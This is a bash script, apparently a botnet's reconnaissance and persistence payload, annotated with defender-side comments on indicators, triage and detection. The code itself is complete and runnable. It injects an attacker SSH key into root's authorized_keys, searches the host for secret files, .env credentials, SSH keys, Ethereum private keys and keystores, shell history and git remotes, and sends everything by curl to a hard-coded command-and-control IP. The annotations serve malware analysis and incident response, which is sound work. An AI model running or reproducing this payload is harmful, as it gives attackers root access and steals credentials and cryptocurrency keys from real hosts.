#!/bin/bash
# C2 lightweight recon — single find pass, 30s total budget
#
# [analysis] Line breaks restored from a collapsed paste; commands are unchanged.
# What the script does, in order:
#   1. Persistence: appends the ed25519 public key held in $_k (key comment
#      "c2@botnet") to /root/.ssh/authorized_keys.
#   2. Discovery: host identity, paths of secret-bearing files, web server
#      names, containers, git remotes, live connections, shell history,
#      known_hosts, selected .env lines, and blockchain-related artefacts.
#   3. Exfiltration: one curl request to $C2/report with everything as
#      url-encoded form fields. The URL is plain http://, so the field names
#      and values are visible to network sensors on the path.
# Indicators present in this file: the C2 URL below, the public key blob and
# its "c2@botnet" comment, the /report path, and form-field names such as
# ssh_priv, eth_pk, eth_keystore, bash_hist.
# Triage on a host where this ran: remove the injected key from
# /root/.ssh/authorized_keys and review root SSH logins. Most fields carry file
# PATHS only, but env_urls, eth_pk, bash_hist and git_remotes carry content, and
# the injected key gives whoever holds the private half root SSH access, so
# treat every listed secret as exposed and rotate it.
# Nearly every command discards stderr (2>/dev/null), so a run leaves little
# terminal or log noise; rely on process, file-integrity and egress telemetry.
C2="http://216.203.21.28:8888"
T=5 # per-cmd timeout
# [analysis] $T bounds only the commands wrapped in `timeout $T`. No global timer
# is visible, and the recursive greps further down run without any timeout.

# === SSH key injection (silent, idempotent) ===
# [analysis] Creates /root/.ssh and authorized_keys if missing, sets the 700/600
# modes, then appends $_k unless a line containing "c2@botnet" is already there.
# The idempotence check matches the key comment, not the key blob. Detection:
# file-integrity or audit watches on /root/.ssh/authorized_keys, and a search of
# authorized_keys files fleet-wide for the blob or the comment string.
_k="ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEm2AE5ZZQpq0FgrOazjZPqRTxbgoIgpQboQdUcPUIkb c2@botnet"
mkdir -p /root/.ssh 2>/dev/null
chmod 700 /root/.ssh 2>/dev/null
touch /root/.ssh/authorized_keys 2>/dev/null
chmod 600 /root/.ssh/authorized_keys 2>/dev/null
grep -qF "c2@botnet" /root/.ssh/authorized_keys 2>/dev/null || echo "$_k" >> /root/.ssh/authorized_keys

# [analysis] Host identity: public IP via an outbound request to ifconfig.me
# ("unk" on failure), hostname, and PRETTY_NAME sourced from /etc/os-release
# inside the command-substitution subshell.
ip=$(timeout $T curl -s ifconfig.me 2>/dev/null||echo unk)
hn=$(hostname)
os=$(. /etc/os-release 2>/dev/null;echo "$PRETTY_NAME")

# === single find: collect everything in one pass (max 15s) ===
# [analysis] Walks / to depth 4 for regular files named .env, *.key, *.pem,
# UTC--* and keystore.json (names used for Ethereum keystore files),
# package.json, id_rsa and id_ed25519, skipping node_modules, /proc and /sys.
# $_raw holds the matching PATHS, one per line; file contents are not read here.
_raw=$(timeout 15 find / -maxdepth 4 \
  \( -name ".env" -o -name "*.key" -o -name "*.pem" -o -name "UTC--*" -o -name "keystore.json" \
  -o -name "package.json" -o -name "id_rsa" -o -name "id_ed25519" \) \
  -not -path "*/node_modules/*" -not -path "/proc/*" -not -path "/sys/*" \
  -type f 2>/dev/null)

# split results
# [analysis] Each variable is a '|'-joined, capped list of paths filtered from
# $_raw: .env files (10), key/pem files (10), SSH private keys with .pub
# excluded (5), keystore files (5).
env_f=$(echo "$_raw"|grep '\.env$'|head -10|tr '\n' '|')
key_f=$(echo "$_raw"|grep -E '\.(key|pem)$'|head -10|tr '\n' '|')
ssh_p=$(echo "$_raw"|grep -E 'id_rsa$|id_ed25519$'|grep -v '\.pub'|head -5|tr '\n' '|')
ks=$(echo "$_raw"|grep -E 'UTC--|keystore\.json'|head -5|tr '\n' '|')
# [analysis] Reads the "name" field of up to five package.json files with
# python3, which identifies the Node projects deployed on the host.
pkg=$(echo "$_raw"|grep 'package.json'|head -5|while read f;do timeout 1 python3 -c "import json;print(json.load(open('$f')).get('name',''))" 2>/dev/null;done|sort -u|tr '\n' '|')

# === quick checks (parallel background) ===
# [analysis] Intended to list nginx server_name and Apache ServerName/ServerAlias
# values. Each assignment runs in a backgrounded subshell, so $ng and $ap are
# still unset in this shell after `wait`; as written, the nginx_domains and
# apache_domains report fields are sent empty.
ng=$(grep -rh 'server_name' /etc/nginx/ 2>/dev/null|grep -v '#'|sed 's/server_name//;s/;//'|tr -s ' '|sort -u|tr '\n' '|'|head -c 400) &
ap=$(grep -rh 'ServerName\|ServerAlias' /etc/apache2/ /etc/httpd/ 2>/dev/null|grep -v '#'|awk '{print $2}'|sort -u|tr '\n' '|'|head -c 400) &
wait

# docker (fast)
# [analysis] Container name, image and published ports for running containers,
# capped at 600 bytes.
dk=$(timeout $T docker ps --format '{{.Names}}|{{.Image}}|{{.Ports}}' 2>/dev/null|tr '\n' ';'|head -c 600)

# git remotes (only common dirs, no find /)
# [analysis] Reads the origin URL from .git/config in /root, each /home/* dir,
# /opt, /var/www, /srv and their immediate subdirectories. Remote URLs can embed
# credentials or tokens; check any that were present and rotate them.
gr=""
for d in /root /home/* /opt /var/www /srv; do
  [ -f "$d/.git/config" ] && gr="$gr$(grep -A1 'remote "origin"' "$d/.git/config" 2>/dev/null|grep url|awk '{print $3}')|"
  for sd in "$d"/*/; do
    [ -f "${sd}.git/config" ] && gr="$gr$(grep -A1 'remote "origin"' "${sd}.git/config" 2>/dev/null|grep url|awk '{print $3}')|"
  done
done
gr=$(echo "$gr"|head -c 400)

# network + history
# [analysis] net: local>peer pairs of established TCP connections, loopback
# excluded. hist: the last 30 lines of root's bash history filtered to commands
# mentioning ssh/curl/wget/docker/redis/mysql/aws/kubectl; such command lines
# may carry inline credentials. kh: the first column of root's known_hosts
# (host names, or hashed entries if the file stores hashes).
net=$(ss -tnp 2>/dev/null|grep ESTAB|awk '{print $4">"$5}'|grep -v '127.0.0.1\|::1'|head -15|tr '\n' '|')
hist=$(tail -30 /root/.bash_history 2>/dev/null|grep -iE 'ssh|curl|wget|docker|redis|mysql|aws|kubectl'|tr '\n' '|'|head -c 400)
kh=$(awk '{print $1}' /root/.ssh/known_hosts 2>/dev/null|sort -u|tr '\n' '|'|head -c 400)

# env URLs (from already found .env files)
# [analysis] Unlike the path lists above, this reads file CONTENT: lines matching
# URL=, HOST=, API= or RPC= from the first five .env files. Connection strings
# on such lines may include passwords or API keys.
eu=$(echo "$env_f"|tr '|' '\n'|head -5|while read f;do [ -n "$f" ]&&grep -iE 'URL=|HOST=|API=|RPC=' "$f" 2>/dev/null;done|sort -u|tr '\n' '|'|head -c 400)

# redis
# [analysis] redis-cli is called with no host or auth arguments, so it pings its
# default target; any reply other than the "no-redis" fallback tells the
# operator a Redis instance answered.
rp=$(timeout 2 redis-cli ping 2>/dev/null||echo no-redis)

# === steer (fast targeted checks) ===
# [analysis] Looks for processes matching keeper|orchestrator|steer|vault.*tend,
# found files with "steer" in the path, and files under /root /home /opt
# /var/www containing steer.finance, steerprotocol or 0x4867dc4e. The patterns
# suggest specific interest in hosts running Steer-related services; that is
# inferred from the strings only. The grep -rl here has no timeout.
st=""
_sp=$(ps aux 2>/dev/null|grep -iE 'keeper|orchestrator|steer|vault.*tend'|grep -v grep|head -3|tr '\n' '|')
[ -n "$_sp" ] && st="PROC:$_sp|"
_sf=$(echo "$_raw"|grep -i steer|head -3|tr '\n' '|')
[ -n "$_sf" ] && st="${st}FILES:$_sf|"
_sa=$(grep -rl 'steer.finance\|steerprotocol\|0x4867dc4e' /root/ /home/ /opt/ /var/www/ 2>/dev/null|head -3|tr '\n' '|')
[ -n "$_sa" ] && st="${st}ADDR:$_sa|"

# === crypto deep (from already found files, no extra find) ===
# [analysis] The heading is inaccurate: epk is a fresh recursive grep over /root,
# /home/*/, /opt and /var/www, not a pass over $_raw. It extracts up to five
# unique strings of the form 0x + 64 hex digits, the shape of a raw 32-byte
# private key (and of hashes), and sends the matched VALUES. If this field was
# populated, treat any wallet key stored in those trees as disclosed.
epk=$(grep -rhoP '0x[0-9a-fA-F]{64}' /root/ /home/*/ /opt/ /var/www/ 2>/dev/null|sort -u|head -5|tr '\n' '|')
# [analysis] Listening sockets on 8545, 30303, 26657, 9944, 8899: ports commonly
# used by blockchain node software, i.e. a check for whether the host runs one.
cp=$(ss -tlnp 2>/dev/null|grep -E ':8545|:30303|:26657|:9944|:8899'|awk '{print $4}'|tr '\n' '|')

# === send ===
# [analysis] A single request, bounded at 10 s, to $C2/report. --data-urlencode
# makes curl send a form-encoded POST body. The "crypto" field repeats $key_f
# (same value as key_files). Egress detection: cleartext HTTP to the C2 address
# on port 8888 with path /report and this set of parameter names.
timeout 10 curl -s "$C2/report" \
  --data-urlencode "ip=$ip" \
  --data-urlencode "hn=$hn" \
  --data-urlencode "os=$os" \
  --data-urlencode "who=$(whoami)" \
  --data-urlencode "redis=$rp" \
  --data-urlencode "uptime=$(uptime)" \
  --data-urlencode "mem=$(free -h 2>/dev/null|awk '/Mem/{print $2}')" \
  --data-urlencode "docker=$(docker ps -q 2>/dev/null|wc -l)" \
  --data-urlencode "nginx_domains=$ng" \
  --data-urlencode "apache_domains=$ap" \
  --data-urlencode "env_files=$env_f" \
  --data-urlencode "key_files=$key_f" \
  --data-urlencode "ssh_priv=$ssh_p" \
  --data-urlencode "git_remotes=$gr" \
  --data-urlencode "docker_images=$dk" \
  --data-urlencode "pkg_names=$pkg" \
  --data-urlencode "net_conns=$net" \
  --data-urlencode "bash_hist=$hist" \
  --data-urlencode "known_hosts=$kh" \
  --data-urlencode "env_urls=$eu" \
  --data-urlencode "steer=$st" \
  --data-urlencode "eth_pk=$epk" \
  --data-urlencode "eth_keystore=$ks" \
  --data-urlencode "chain_ports=$cp" \
  --data-urlencode "crypto=$key_f" \
  2>/dev/null